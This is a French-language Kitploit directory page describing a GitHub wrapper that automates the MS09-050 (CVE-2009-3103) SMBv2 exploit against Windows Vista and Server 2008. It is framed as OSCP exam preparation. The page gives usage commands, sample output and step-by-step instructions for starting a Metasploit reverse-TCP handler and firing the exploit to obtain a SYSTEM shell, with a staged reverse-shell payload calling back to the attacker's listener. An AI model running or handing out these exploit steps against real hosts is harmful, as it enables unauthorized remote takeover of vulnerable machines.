Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeTests d'IntrusionApprentissage et Éducation
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

Wrapper d'exploitation automatisé pour MS09-050 (CVE-2009-3103) ciblant SMBv2 sur Windows Vista/Server 2008. Génère le shellcode, construit l'exploit et crée un handler Metasploit pour un accès shell SYSTEM.

Voir le dépôt
2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Wrapper d'exploit SMBv2 MS09-050

Mise en place en une ligne pour l'exploitation de MS09-050 (CVE-2009-3103). Sans prise de tête, sans débogage, ça fonctionne.

Pourquoi ?

La plupart des scripts MS09-050 qui circulent nécessitent une injection manuelle du shellcode, ont des problèmes de timing avec les handlers, ou tout simplement ne fonctionnent pas. Ce wrapper :

  • Génère le shellcode avec les bons paramètres
  • Construit l'exploit automatiquement
  • Crée un handler Metasploit prêt à l'emploi
  • Vous indique exactement quoi exécuter

Conçu pour la préparation à l'OSCP, où le temps compte.

Cible

  • Vulnérabilité : MS09-050 / CVE-2009-3103
  • Systèmes affectés : Windows Vista SP1/SP2, Windows Server 2008 (avant R2)
  • Service : SMBv2 sur le port 445
  • Résultat : shell SYSTEM

Prérequis

  • Kali Linux (ou toute distribution avec Metasploit)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (généralement préinstallé)
  • Utilisation

    root@kitploit:~
    ./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
    

    Exemple

    root@kitploit:~
    ./ms09_050.sh 192.168.233.40 192.168.45.232 443
    

    Sortie :

    root@kitploit:~
    [*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
    [*] Generating shellcode...
    [+] Files created:
        - exploit.py
        - handler.rc
    
    === RUN ===
    
    Terminal 1:  msfconsole -q -r handler.rc
    Terminal 2:  python2 exploit.py 192.168.233.40
    

    Exécution

    1. Terminal 1 - Démarrez le handler :

      root@kitploit:~
      msfconsole -q -r handler.rc
      

      Attendez le message : Started reverse TCP handler on ...

    2. Terminal 2 - Lancez l'exploit :

      root@kitploit:~
      python2 exploit.py 192.168.233.40
      
    3. Vérifiez dans le Terminal 1 que vous avez bien votre shell.

    Notes

    • Utilise un payload stagé (windows/shell/reverse_tcp) - fonctionne de manière fiable avec le stager de cet exploit
    • Si l'exploit échoue, la cible a peut-être besoin d'un redémarrage ou n'est pas vulnérable
    • Le port 443 est recommandé si 4444 est filtré

    Crédits

    Exploit original basé sur le PoC MS09-050 d'ohnozzy.

    Licence

    MIT - Faites ce que vous voulez, ne soyez simplement pas diabolique.

    Télécharger l’outil